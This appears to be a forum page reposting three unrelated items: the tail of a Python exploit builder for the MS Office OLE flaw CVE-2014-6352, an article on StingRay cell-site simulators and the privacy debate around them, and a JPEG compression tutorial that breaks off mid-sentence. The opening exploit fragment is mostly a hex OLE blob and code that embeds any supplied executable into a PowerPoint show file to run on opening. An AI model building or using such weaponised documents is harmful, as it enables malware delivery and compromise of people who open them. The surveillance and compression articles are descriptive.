"\x52\x03\x00\x00\x53\x03\x00\x00\x54\x03\x00\x00\x55\x03\x00\x00\x56\x03\x00\x00\x57\x03\x00\x00\x58\x03\x00\x00\x59\x03\x00\x00\x5A\x03" "\x00\x00\x5B\x03\x00\x00\x5C\x03\x00\x00\x5D\x03\x00\x00\x5E\x03\x00\x00\x5F\x03\x00\x00\x60\x03\x00\x00\x61\x03\x00\x00\x62\x03\x00\x00" "\x63\x03\x00\x00\x64\x03\x00\x00\x65\x03\x00\x00\x66\x03\x00\x00\x67\x03\x00\x00\x68\x03\x00\x00\x69\x03\x00\x00\x6A\x03\x00\x00\x6B\x03" "\x00\x00\x6C\x03\x00\x00\x6D\x03\x00\x00\x6E\x03\x00\x00\x6F\x03\x00\x00\x70\x03\x00\x00\x71\x03\x00\x00\x72\x03\x00\x00\x73\x03\x00\x00" "\x74\x03\x00\x00\x75\x03\x00\x00\x76\x03\x00\x00\x77\x03\x00\x00\x78\x03\x00\x00\x79\x03\x00\x00\x7A\x03\x00\x00\x7B\x03\x00\x00\x7C\x03" "\x00\x00\x7D\x03\x00\x00\x7E\x03\x00\x00\x7F\x03\x00\x00\x80\x03\x00\x00\x81\x03\x00\x00\x82\x03\x00\x00\x83\x03\x00\x00\x84\x03\x00\x00" "\x85\x03\x00\x00\x86\x03\x00\x00\x87\x03\x00\x00\x88\x03\x00\x00\x89\x03\x00\x00\x8A\x03\x00\x00\x8B\x03\x00\x00\x8C\x03\x00\x00\x8D\x03" "\x00\x00\x8E\x03\x00\x00\x8F\x03\x00\x00\x90\x03\x00\x00\x91\x03\x00\x00\x92\x03\x00\x00\x93\x03\x00\x00\x94\x03\x00\x00\x95\x03\x00\x00" "\x96\x03\x00\x00\x97\x03\x00\x00\x98\x03\x00\x00\x99\x03\x00\x00\x9A\x03\x00\x00\x9B\x03\x00\x00\x9C\x03\x00\x00\x9D\x03\x00\x00\x9E\x03" "\x00\x00\x9F\x03\x00\x00\xA0\x03\x00\x00\xA1\x03\x00\x00\xA2\x03\x00\x00\xA3\x03\x00\x00\xA4\x03\x00\x00\xA5\x03\x00\x00\xA6\x03\x00\x00" "\xA7\x03\x00\x00\xA8\x03\x00\x00\xA9\x03\x00\x00\xAA\x03\x00\x00\xAB\x03\x00\x00\xAC\x03\x00\x00\xAD\x03\x00\x00\xAE\x03\x00\x00\xAF\x03" "\x00\x00\xB0\x03\x00\x00\xB1\x03\x00\x00\xB2\x03\x00\x00\xB3\x03\x00\x00\xB4\x03\x00\x00\xB5\x03\x00\x00\xB6\x03\x00\x00\xB7\x03\x00\x00" "\xB8\x03\x00\x00\xB9\x03\x00\x00\xBA\x03\x00\x00\xBB\x03\x00\x00\xBC\x03\x00\x00\xBD\x03\x00\x00\xBE\x03\x00\x00\xBF\x03\x00\x00\xC0\x03" "\x00\x00\xC1\x03\x00\x00\xC2\x03\x00\x00\xC3\x03\x00\x00\xC4\x03\x00\x00\xC5\x03\x00\x00\xC6\x03\x00\x00\xC7\x03\x00\x00\xC8\x03\x00\x00" "\xC9\x03\x00\x00\xCA\x03\x00\x00\xCB\x03\x00\x00\xCC\x03\x00\x00\xCD\x03\x00\x00\xCE\x03\x00\x00\xCF\x03\x00\x00\xD0\x03\x00\x00\xD1\x03" "\x00\x00\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x19\x91\x07\x00\x02\x00\x70\x75\x74\x74\x79\x2E\x65\x78" "\x65\x00\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x48\x43\x4C\x5C\x44\x65\x73\x6B\x74\x6F\x70\x5C\x50\x4F\x43\x5C\x70\x75\x74\x74\x79\x2E\x65" "\x78\x65\x00\x00\x00\x03\x00\x2A\x00\x00\x00\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x48\x43\x4C\x5C\x41\x70\x70\x44\x61\x74\x61\x5C\x4C\x6F" "\x63\x61\x6C\x5C\x54\x65\x6D\x70\x5C\x70\x75\x74\x74\x79\x2E\x65\x78\x65\x00\x00\x90\x07\x00" ) if len(sys.argv) != 2: print ("[+] Usage: "+ sys.argv[0] + " [exe file] (EXE file should be less than 400KB)") exit(0) file = sys.argv[1] f = open(file,mode='rb') buff=f.read() f.close() evilbuff = bytearray((oleole + buff)) evilbuff += "\x00" * 20000 file = "temp\ppt\embeddings\oleObject1.bin" f = open(file,mode='wb') f.write(evilbuff) print ("[+] Injected exe into OLE") shutil.make_archive("exploit", "zip", "temp") print ("[+] packing exploit ppsx") shutil.move('exploit.zip', 'CVE-2014-6352.ppsx') print ("[+] Done") Sursa: MS Office 2007 and 2010 - OLE Arbitrary Command Execution
  2. StingRay Technology: How Government Tracks Cellular Devices StingRay Technology StingRay is an IMSI-catcher (International Mobile Subscriber Identity) designed and commercialized by the Harris Corporation. The cellular-surveillance system costs as much as $400,000 in the basic configuration, and its price varies with add-ons ordered by the agency. The IMSI-catcher is a surveillance solution used by military and intelligence agencies for telephone eavesdropping. It allows for intercepting mobile phone traffic and tracking movements of mobile phone users. Essentially, an IMSI catcher operates as a bogus mobile cell tower that sits between the target mobile phone and the service provider’s real towers. The IMSI catcher runs a Man In the Middle (MITM) attack that could not be detected by the users without using specific products that secure communication on mobile devices. The use of the IMSI-catcher is raising a heated debate in the United States because devices like StingRay and other similar cellphone tracking solutions are being widely adopted by law enforcement agencies across the country. Due to the popularity of StingRay, the name is used improperly to reference several types of cellphone-surveillance solutions. StingRay allows law enforcement to intercept calls and Internet traffic, send fake texts, inject malware on a mobile device, and to locate the targets. Privacy advocates are concerned with possible abuses of such invasive technology. They speculate that there is the concrete risk that cyber criminals and foreign state-sponsored hackers could use it to track US citizens. StingRay-like solutions, also known as cell site simulators, trick cellphones into revealing different data, including users’ locations and identifying information. Law enforcement and intelligence agencies can target a specific individual analyzing incoming and outgoing calls and drawing on his social network. The principal problem in the adoption of the StingRay cellphone-surveillance technology is that, different from other solutions, it targets all nearby cellular devices, allowing an attacker to get information from hundreds of devices concurrently. Figure 1 – StingRay As explained by Nathan Freed Wessler, an attorney with the ACLU’s Speech, Privacy & Technology Project, StingRay equipment sends intrusive electronic signals in the immediate vicinity, sinking private buildings and siphoning data about the locations and identities of cellphones inside. The Federal Communications Commission (FCC) recently created an internal task force to study the misuse of IMSI catchers in the cybercrime ecosystem and foreign intelligence agencies, which demonstrated that this technology could be used to spy on American citizens, businesses and diplomats. How does StingRay work? StingrRay equipment could operate in both active and passive modes. In the first case, the device simulates the behavior of a wireless carrier cell tower. In the second case, it actively interferes with cellular devices performing operations like data exfiltration. The StingRay system is typically installed in a vehicle in a way that agents can move it into any neighborhood. It tricks all nearby cellular devices into connecting to it and allowing data access by law enforcement. Let us see in detail the two operative modes implemented by the StingRay technology. The Passive mode A StingRay that is operating in passive mode is able to receive and analyze signals being transmitted by mobile devices and wireless carrier cell stations. The term “passive” indicates that the equipment doesn’t communicate directly with cellular devices and does not simulate a wireless carrier cell site. The activity of base station surveys allows extracting information on cell sites that includes identification numbers, signal strength, and signal coverage areas. StingRay operates as a mobile phone and collects signals sent by cell stations near the equipment. The Active mode StingRay equipment operating in “active mode” will force each cellular device in a predetermined area to disconnect from its legitimate service provider cell site and establish a new connection with the attacker’s StingRay system. StingRay broadcasts a pilot signal that is stronger than the signals sent by legitimate cell sites operating in the same area, forcing connections from the cellular device in the area covered by the equipment. The principal operations made by the StingRay are: Data Extraction from cellular devices – StingRay collects information that identifies a cellular device (i.e. IMSI, ESN) directly from it by using radio waves. Run Man In The Middle attacks to eavesdrop on Communications Content Writing metadata to the cellular device Denial of Service, preventing the cellular device user from placing a call or accessing data services. Forcing an increase in signal transmission power Forcing an abundance of signal transmissions Tracking and locating Figure 2 – StingRay case study USA – StingRay is a prerogative of intelligence agencies Surveillance of cell phones is a common practice in intelligence agencies. Agents have used devices like StingRay for a long time, and the use has extended to local law enforcement in the USA. Dozens of local law enforcement and police agencies are collecting information about thousands of cell phone devices at a time by using advanced technology, according to public records obtained by various media agencies in the country. USA Today reported that records from more than 125 police agencies in 33 states reveal that nearly 25 percent of law-enforcement agencies have used “tower dump,” and at least 25 police departments have purchased StingRay equipment. Many police agencies have denied public records requests, arguing that criminals or terrorists could benefit from the disclosure of information and avoid surveillance methods adopted locally by law enforcement. Security experts and privacy advocates raise the discussion regarding the use of StingRay technology and the way the law enforcement agencies manage/share citizens’ data. The militarization of America’s local police agencies is a phenomenon attracting the attention of the media as never before, probably also as a consequence of the debate on privacy and surveillance triggered by the Snowden’s revelations. The phenomena are not limited to the US. Recent documents released by the City of Oakland reveal that the local Police Department, the nearby Fremont Police Department, and the Alameda County District Attorney jointly requested an upgrade for their cellular surveillance equipment. The specific update to StingRay is known as Hailstorm, and is necessary to allow the equipment to track also cellular devices of new generation. According to the Ars web portal, the upgrade will cost $460,000, including $205,000 in total Homeland Security grant money and $50,000 from the Oakland Police Department. Cellular tracking technology like StingRay is still considered a privileged solution to track cellular devices and siphon their data. The interest of local law enforcement in the surveillance solutions is increasing and the decision to update their configuration led privacy experts to believe that their diffusion will continue to increase. A look at the technologies that track cellular devices To better understand the StingRay technology, let us familiarize ourselves with the names of the principal surveillance solutions available on the market. Triggerfish Triggerfish is an eavesdropping equipment that allows law enforcement to intercept cellular conversations in real time. Its use extends the basic capabilities of StingRay, which are more oriented to device location monitoring and gathering metadata. Triggerfish allows authorities to monitor up to 60,000 different phones at one time over the targeted area. Figure 3 – Triggerfish According a post published by the journalist Ryan Gallagher on Ars, its cost ranges between $90,000 and $102,000. Kingfish Kingfish is a surveillance transceiver that is used by law enforcement and intelligence agencies to track cellular devices and exfiltrate information from mobile devices over a targeted area. It could be concealed in a briefcase and allows gathering of unique identity codes and shows connections between phones and numbers being dialed. Its cost is slightly higher than $25,000. Figure 4 – Kingfish Amberjack Amberjack is an important accessory for the surveillance systems like StingRay, Gossamer, and Kingfish. It is a direction-finding system antenna that is used for cellular device tracking. It costs nearly $35,015. Harpoon Harpoon is an “amplifier” (PDF) that can work in conjunction with both Stingray and Kingfish devices to track targets from a greater distance. Its cost ranges between $16,000 and $19,000. Figure 5 – Harpoon Hailstorm Hailstorm is a surveillance device that could be purchased as a standalone unit or as an upgrade to the Stingray or Kingfish. The system allows the tracking of cellular devices even if they are based on modern technology. “Procurement documents (PDF) show that Harris Corp. has, in at least one case, recommended that authorities use the Hailstorm in conjunction with software made by Nebraska-based surveillance company Pen-Link. The Pen-Link software appears to enable authorities deploying the Hailstorm to directly communicate with cell phone carriers over an Internet connection, possibly to help coordinate the surveillance of targeted individuals,” states an Ars blog post. The cost of Hailstorm is $169,602 if it is sold as a standalone unit, and it could be cheaper if acquired as an upgrade. Gossamer Gossamer is a portable unit that is used to access data on cellular devices operating in a target area. Gossamer provides similar functionality of StingRay with the advantage of being a hand-held model. Gossamer also lets law enforcement run a DoS attack on a target, blocking it from making or receiving calls, as explained in the marketing materials (PDF) published by a Brazilian reseller of the Harris equipment. Gossamer is sold for $19,696. Figure 6 – The Gossamer The Case: Metropolitan Police Department (MPD) uses StingRay StingRay has been used for a long time by the police. In 2003, the Metropolitan Police Department (MPD) in Washington, DC was awarded a $260,000 grant from the Department of Homeland Security (DHS) to acquire StingRay. The purchase was officially motivated by the need to increase capabilities in the investigation of possible terroristic events. Unfortunately, the device was not used by law enforcement for five years due to the lack of funds to pay for training for its use. In 2008, the Metropolitan Police Department decided to again adopt StingRay for its investigations, and received funds to upgrade it. The VICE News has documented numerous purchases made by the DC police department and related to the solution of services offered by the Harris Corporation. The problem is that according to government officials the systems weren’t used to prevent the terrorism act, but law enforcement is using it in routine investigations involving ordinary crime. There is no documentation regarding the use of StingRay made by the agents of the department. In a memo dated December 2008, DC chief of police and other top department officials by the commander of the Narcotics and Special Investigations Division explained how the department intended to use StingRay. “If DC police are driving around with a Stingray device, they’re likely capturing information about the locations and movements of members of Congress, cabinet members, foreign dignitaries, and all of the other people who congregate in the District. “The [redacted] will be used by MPD to track cellular phones possessed by criminal offenders and/or suspected terrorists by using wireless technology to triangulate the location of the phone,” “The ability to [redacted] in the possession of criminals will allow MPD to track their exact movements, as well as pinpoint their current locations for rapid apprehension,” states the document. “The procurement of this equipment will increase the number of MPD arrests for fugitives, drug traffickers, and violent offenders (robbery, assault with a deadly weapon, Homicide), while reducing the time it takes to locate dangerous offenders that need to be removed from the streets of DC.” The memo confirms that the department has used the StingRay for many purposes other than counter terrorism activities. Many organizations are condemning the use of such technology because it represents a serious threat to the privacy of the citizens. When an agency uses StingRay to track a specific individual, it is very likely that the system will also catch many other devices of innocent and unaware people. “When it’s used to track a suspect’s cell phone, [it] also gather information about the phones of countless bystanders who happen to be nearby,” explains the representatives at the American Civil Liberties Union (ACLU). StingRay is also a privileged instrument to collect information about ongoing communications, including phone numbers of interlocutors. It is important to understand that its use opens the door to a “sort of invasive surveillance”. The principal problem related to the use of Stingrays and similar solutions is related to their application context. This category of equipment, in fact, was mainly designed to support intelligence activities, but today its use has been extended to local law enforcement, as explained by Nathan Wessler: “Initially the domain of the National Security Agency (NSA) and other intelligence agencies,” the use of the tracking device has now “trickled down to federal, state, and local law enforcement.” The extensive use of StingRay is a violation of the Fourth Amendment; it is threatening the rights of tens of thousands of DC residents. The ACLU has identified 44 law enforcement agencies in 18 states in the US that use StingRay equipment for their investigation, but as explained by Wessler it must be considered that the use of such devices in the vicinity of government offices is a circumstance of great concern. That’s why he mentioned the case of the capital Washington. “An inherent attribute of how this technology functions is that it sweeps in information about large numbers of innocent bystanders even when police are trying to track the location of a particular suspect. If the MPD is driving around DC with Stingray devices, it is likely capturing information about the locations and movements of members of Congress, cabinet members, federal law enforcement agents, and Homeland Security personnel, consular staff, and foreign dignitaries, and all of the other people who congregate in the District…. If cell phone calls of congressional staff, White House aides, or even members of Congress are being disconnected, dropped, or blocked by MPD Stingrays, that’s a particularly sensitive and troublesome problem,” said Wessler during an interview with VICE News. The documents obtained by the website Muckrock from the FBI revealed that law enforcement agencies are required to sign a non-disclosure agreement with the Bureau before they can start using StingRays for their investigation. The ACLU obtained emails that explain that the vendor Harris Corporation misled the FCC for approval of Stingray by supposing its adoption for “emergency situations.” In reality, the equipment is used by law enforcement for any kind of investigation. The following map reports the use of the StingRay tracking system by state and local police departments. According to the ACLU, 46 agencies in 18 states and the District of Columbia own StingRays. According to privacy experts, the data underestimates the real diffusion in the use of the StingRay system because of lack of official documentation that would report the number of investigations in which the equipment has been used. Figure 7 – StingRay diffusion in the USA Conclusion StingRay technology raises serious privacy concerns because of the indiscriminate way it targets cellular devices in a specific area. The dragnet way in which StingRay operates appears to be in contrast with the principle of various laws worldwide. Government and law enforcement shouldn’t be able to access citizen’s private information without proving to a court order that must be issued to support investigation activities. In the US, for example, the Fourth Amendment stands for the basic principle that the US government cannot conduct a massive surveillance operation, also indicated as “general searches”. The Supreme Court recently reiterated that principle in a case involving cell phone surveillance, and confirmed that law enforcement need a warrant to analyze data on the suspect’s cellphone. Organizations for the defense of civil liberties ask governments to provide warrants to use surveillance technologies like StingRay. The warrant still represents a reasonable mechanism for ensuring the right balance between the citizen’s privacy and law enforcement needs. Organizations such as the American Civil Liberties Union and Electronic Privacy Information Center (EPIC) highlighted the risks related to the indiscriminate collection of a so large amount of cellular data. “I don’t think that these devices should never be used, but at the same time, you should clearly be getting a warrant,” said Alan Butler of EPIC. Unfortunately, cases such as the one disclosed in this post suggest that governments are using StingRay equipment in secrecy. In some cases, a court order is issued for specific activities, but law enforcement arbitrarily extends the use of technology in other contexts that may be menacing to citizens’ privacy. References https://news.vice.com/article/police-in-washington-dc-are-using-the-secretive-stingray-cell-phone-tracking-tool Surveillance - How to secretly track cellphone users position | Security Affairs https://www.aclu.org/blog/national-security-technology-and-liberty/trickle-down-surveillance https://www.aclu.org/maps/stingray-tracking-devices-whos-got-them Cellphone spying gear, law enforcement has it, and it wants you to forget about it https://www.scribd.com/doc/238334715/Stingray-Phone-Tracker LYE: Short-circuiting 'stingray' surveillance of cellphones - Washington Times Cellphone data spying: It's not just the NSA https://www.aclu.org/files/assets/rigmaiden_-_doj_stingray_emails_declaration.pdf Meet the machines that steal your phone’s data | Ars Technica http://cdn.arstechnica.net/wp-content/uploads/2013/09/amberjack.pdf Request 2595 http://cdn.arstechnica.net/wp-content/uploads/2013/09/oakland-penlink-hailstorm.pdf By Pierluigi Paganini|November 10th, 2014|General Security|0 Comments Sursa: StingRay Technology: How Government Tracks Cellular Devices - InfoSec Institute
  3. Image Compression: Seeing What's Not There In this article, we'll study the JPEG baseline compression algorithm... David Austin Grand Valley State University david at merganser.math.gvsu.edu [TABLE=align: right] [TR] [TD][/TD] [TD][/TD] [/TR] [/TABLE] The HTML file that contains all the text for this article is about 25,000 bytes. That's less than one of the image files that was also downloaded when you selected this page. Since image files typically are larger than text files and since web pages often contain many images that are transmitted across connections that can be slow, it's helpful to have a way to represent images in a compact format. In this article, we'll see how a JPEG file represents an image using a fraction of the computer storage that might be expected. We'll also look at some of the mathematics behind the newer JPEG 2000 standard. This topic, more widely known as data compression, asks the question, "How can we represent information in a compact, efficient way?" Besides image files, it is routine to compress data, video, and music files. For instance, compression enables your 8 gigabyte iPod Nano to hold about 2000 songs. As we'll see, the key is to organize the information in some way that reveals an inherent redundancy that can be eliminated. In this article, we'll study the JPEG baseline compression algorithm using the image on the right as an example. (JPEG is an acronym for "Joint Photographic Experts Group.") Some compression algorithms are lossless for they preserve all the original information. Others, such as the JPEG baseline algorithm, are lossy--some of the information is lost, but only information that is judged to be insignificant. Before we begin, let's naively determine how much computer storage should be required for this image. First, the image is arranged in a rectangular grid of pixels whose dimensions are 250 by 375 giving a total of 93,750 pixels. The color of each pixel is determined by specifying how much of the colors red, green and blue should be mixed together. Each color component is represented as an integer between 0 and 255 and so requires one byte of computer storage. Therefore, each pixel requires three bytes of storage implying that the entire image should require 93,750 3 = 281,250 bytes. However, the JPEG image shown here is only 32,414 bytes. In other words, the image has been compressed by a factor of roughly nine. We will describe how the image can be represented in such a small file (compressed) and how it may be reconstructed (decompressed) from this file. The JPEG compression algorithm First, the image is divided into 8 by 8 blocks of pixels. Since each block is processed without reference to the others, we'll concentrate on a single block. In particular, we'll focus on the block highlighted below. Here is the same block blown up so that the individual pixels are more apparent. Notice that there is not tremendous variation over the 8 by 8 block (though other blocks may have more). Remember that the goal of data compression is to represent the data in a way that reveals some redundancy. We may think of the color of each pixel as represented by a three-dimensional vector (R,G, consisting of its red, green, and blue components. In a typical image, there is a significant amount of correlation between these components. For this reason, we will use a color space transform to produce a new vector whose components represent luminance, Y, and blue and red chrominance, Cb and Cr. The luminance describes the brightness of the pixel while the chrominance carries information about its hue. These three quantities are typically less correlated than the (R, G, B) components. Furthermore, psychovisual experiments demonstrate that the human eye is more sensitive to luminance than chrominance, which means that we may neglect larger changes in the chrominance without affecting our perception of the image. Since this transformation is invertible, we will be able to recover the (R,G, vector from the (Y, Cb, Cr) vector. This is important when we wish to reconstruct the image. (To be precise, we usually add 128 to the chrominance components so that they are represented as numbers between 0 and 255.) When we apply this transformation to each pixel in our block we obtain three new blocks, one corresponding to each component. These are shown below where brighter pixels correspond to larger values. [TABLE] [TR] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] Y[/TD] [TD=align: center] Cb[/TD] [TD=align: center] Cr[/TD] [/TR] [/TABLE] As is typical, the luminance shows more variation than the the chrominance. For this reason, greater compression ratios are sometimes achieved by assuming the chrominance values are constant on 2 by 2 blocks, thereby recording fewer of these values. For instance, the image editing software Gimp provides the following menu when saving an image as a JPEG file: The "Subsampling" option allows the choice of various ways of subsampling the chrominance values. Also of note here is the "Quality" parameter, whose importance will become clear soon. The Discrete Cosine Transform Now we come to the heart of the compression algorithm. Our expectation is that, over an 8 by 8 block, the changes in the components of the (Y, Cb, Cr) vector are rather mild, as demonstrated by the example above. Instead of recording the individual values of the components, we could record, say, the average values and how much each pixel differs from this average value. In many cases, we would expect the differences from the average to be rather small and hence safely ignored. This is the essence of the Discrete Cosine Transform (DCT), which will now be explained. We will first focus on one of the three components in one row in our block and imagine that the eight values are represented by f0, f1, ..., f7. We would like to represent these values in a way so that the variations become more apparent. For this reason, we will think of the values as given by a function fx, where x runs from 0 to 7, and write this function as a linear combination of cosine functions: Don't worry about the factor of 1/2 in front or the constants Cw (Cw = 1 for all w except C0 = ). What is important in this expression is that the function fx is being represented as a linear combination of cosine functions of varying frequencies with coefficients Fw. Shown below are the graphs of four of the cosine functions with corresponding frequencies w. [TABLE] [TR] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] w = 0[/TD] [TD=align: center] w = 1[/TD] [/TR] [TR] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] w = 2[/TD] [TD=align: center] w = 3[/TD] [/TR] [/TABLE] Of course, the cosine functions with higher frequencies demonstrate more rapid variations. Therefore, if the values fx change relatively slowly, the coefficients Fw for larger frequencies should be relatively small. We could therefore choose not to record those coefficients in an effort to reduce the file size of our image. The DCT coefficients may be found using Notice that this implies that the DCT is invertible. For instance, we will begin with fx and record the values Fw. When we wish to reconstruct the image, however, we will have the coefficients Fw and recompute the fx. Rather than applying the DCT to only the rows of our blocks, we will exploit the two-dimensional nature of our image. The Discrete Cosine Transform is first applied to the rows of our block. If the image does not change too rapidly in the vertical direction, then the coefficients shouldn't either. For this reason, we may fix a value of w and apply the Discrete Cosine Transform to the collection of eight values of Fw we get from the eight rows. This results in coefficients Fw,u where w is the horizontal frequency and u represents a vertical frequency. We store these coefficients in another 8 by 8 block as shown: Notice that when we move down or to the right, we encounter coefficients corresponding to higher frequencies, which we expect to be less significant. The DCT coefficients may be efficiently computed through a Fast Discrete Cosine Transform, in the same spirit that the Fast Fourier Transform efficiently computes the Discrete Fourier Transform. Quantization Of course, the coefficients Fw,u, are real numbers, which will be stored as integers. This means that we will need to round the coefficients; as we'll see, we do this in a way that facilitates greater compression. Rather than simply rounding the coefficients Fw,u, we will first divide by a quantizing factor and then record round(Fw,u / Qw,u) This allows us to emphasize certain frequencies over others. More specifically, the human eye is not particularly sensitive to rapid variations in the image. This means we may deemphasize the higher frequencies, without significantly affecting the visual quality of the image, by choosing a larger quantizing factor for higher frequencies. Remember also that, when a JPEG file is created, the algorithm asks for a parameter to control the quality of the image and how much the image is compressed. This parameter, which we'll call q, is an integer from 1 to 100. You should think of q as being a measure of the quality of the image: higher values of q correspond to higher quality images and larger file sizes. From q, a quantity is created using Here is a graph of as a function of q: Notice that higher values of q give lower values of . We then round the weights as round(Fw,u / Qw,u) Naturally, information will be lost through this rounding process. When either or Qw,u is increased (remember that large values of correspond to smaller values of the quality parameter q), more information is lost, and the file size decreases. Here are typical values for Qw,u recommended by the JPEG standard. First, for the luminance coefficients: and for the chrominance coefficients: These values are chosen to emphasize the lower frequencies. Let's see how this works in our example. Remember that we have the following blocks of values: [TABLE] [TR] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] Y[/TD] [TD=align: center] Cb[/TD] [TD=align: center] Cr[/TD] [/TR] [/TABLE] Quantizing with q = 50 gives the following blocks: [TABLE] [TR] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] Y[/TD] [TD=align: center] Cb[/TD] [TD=align: center] Cr[/TD] [/TR] [/TABLE] The entry in the upper left corner essentially represents the average over the block. Moving to the right increases the horizontal frequency while moving down increases the vertical frequency. What is important here is that there are lots of zeroes. We now order the coefficients as shown below so that the lower frequencies appear first. In particular, for the luminance coefficients we record 20 -7 1 -1 0 -1 1 0 0 0 0 0 0 0 -2 1 1 0 0 0 0 ... 0 Instead of recording all the zeroes, we can simply say how many appear (notice that there are even more zeroes in the chrominance weights). In this way, the sequences of DCT coefficients are greatly shortened, which is the goal of the compression algorithm. In fact, the JPEG algorithm uses extremely efficient means to encode sequences like this. When we reconstruct the DCT coefficients, we find [TABLE] [TR] [TD] Original[/TD] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD] Reconstructed[/TD] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD=align: center] Y[/TD] [TD=align: center] Cb[/TD] [TD=align: center] Cr[/TD] [/TR] [/TABLE] Reconstructing the image from the information is rather straightforward. The quantization matrices are stored in the file so that approximate values of the DCT coefficients may be recomputed. From here, the (Y, Cb, Cr) vector is found through the Inverse Discrete Cosine Transform. Then the (R, G, B) vector is recovered by inverting the color space transform. Here is the reconstruction of the 8 by 8 block with the parameter q set to 50 [TABLE=align: center] [TR] [TD][/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] Original[/TD] [TD=align: center] Reconstructed (q = 50)[/TD] [/TR] [/TABLE] and, below, with the quality parameter q set to 10. As expected, the higher value of the parameter q gives a higher quality image. [TABLE=align: center] [TR] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=align: center] Original[/TD] [TD=align: center] Reconstructed (q = 10)[/TD] [/TR] [/TABLE] JPEG 2000 While the JPEG compression algorithm has been quite successful, several factors created the need for a new algorithm, two of which we will now describe. First, the JPEG algorithm's use of the DCT leads to discontinuities at the boundaries of the 8 by 8 blocks. For instance, the color of a pixel on the edge of a block can be influenced by that of a pixel anywhere in the block, but not by an adjacent pixel in another block. This leads to blocking artifacts demonstrated by the version of our image created with the quality parameter q set to 5 (by the way, the size of this image file is only 1702 bytes) and explains why JPEG is not an ideal format for storing line art. In addition, the JPEG algorithm allows us to recover the image at only one resolution. In some instances, it is desirable to also recover the image at lower resolutions, allowing, for instance, the image to be displayed at progressively higher resolutions while the full image is being downloaded. To address these demands, among others, the JPEG 2000 standard was introduced in December 2000. While there are several differences between the two algorithms, we'll concentrate on the fact that JPEG 2000 uses a wavelet transform in place of the DCT. Before we explain the wavelet transform used in JPEG 2000, we'll consider a simpler example of a wavelet transform. As before, we'll imagine that we are working with luminance-chrominance values for each pixel. The DCT worked by applying the transform to one row at a time, then transforming the columns. The wavelet transform will work in a similar way. To this end, we imagine that we have a sequence f0, f1, ..., fn describing the values of one of the three components in a row of pixels. As before, we wish to separate rapid changes in the sequence from slower changes. To this end, we create a sequence of wavelet coefficients: Notice that the even coefficients record the average of two successive values--we call this the low pass band since information about high frequency changes is lost--while the odd coefficients record the difference in two successive values--we call this the high pass band as high frequency information is passed on. The number of low pass coefficients is half the number of values in the original sequence (as is the number of high pass coefficients). It is important to note that we may recover the original f values from the wavelet coefficients, as we'll need to do when reconstructing the image: We reorder the wavelet coefficients by listing the low pass coefficients first followed by the high pass coefficients. Just as with the 2-dimensional DCT, we may now apply the same operation to transform the wavelet coefficients vertically. This results in a 2-dimensional grid of wavelet coefficients divided into four blocks by the low and high pass bands: As before, we use the fact that the human eye is less sensitive to rapid variations to deemphasize the rapid changes seen with the high pass coefficients through a quantization process analagous to that seen in the JPEG algorithm. Notice that the LL region is obtained by averaging the values in a 2 by 2 block and so represents a lower resolution version of the image. In practice, our image is broken into tiles, usually of size 64 by 64. The reason for choosing a power of 2 will be apparent soon. We'll demonstrate using our image with the tile indicated. (This tile is 128 by 128 so that it may be more easily seen on this page.) Notice that, if we transmit the coefficients in the LL region first, we could reconstruct the image at a lower resolution before all the coefficients had arrived, one of aims of the JPEG 2000 algorithm. We may now perform the same operation on the lower resolution image in the LL region thereby obtaining images of lower and lower resolution. The wavelet coefficients may be computed through a lifting process like this: The advantage is that the coefficients may be computed without using additional computer memory--a0 first replaces f0 and then a1 replaces f1. Also, in the wavelet transforms that are used in the JPEG 2000 algorithm, the lifting process enables faster computation of the coefficients. The JPEG 2000 wavelet transform The wavelet transform described above, though similar in spirit, is simpler than the ones proposed in the JPEG 2000 standard. For instance, it is desirable to average over more than two successive values to obtain greater continuity in the reconstructed image and thus avoid phenomena like blocking artifacts. One of the wavelet transforms used is the Le Gall (5,3) spline in which the low pass (even) and high pass (odd) coefficients are computed by As before, this transform is invertible, and there is a lifting scheme for performing it efficiently. Another wavelet transform included in the standard is the Cohen-Daubechies-Fauraue 9/7 biorthogonal transform, whose details are a little more complicated to describe though a simple lifting recipe exists to implement it. It is worthwhile to compare JPEG and JPEG 2000. Generally speaking, the two algorithms have similar compression ratios, though JPEG 2000 requires more computational effort to reconstruct the image. JPEG 2000 images do not show the blocking artifacts present in JPEG images at high compression ratios but rather become more blurred with increased compression. JPEG 2000 images are often judged by humans to be of a higher quality. At 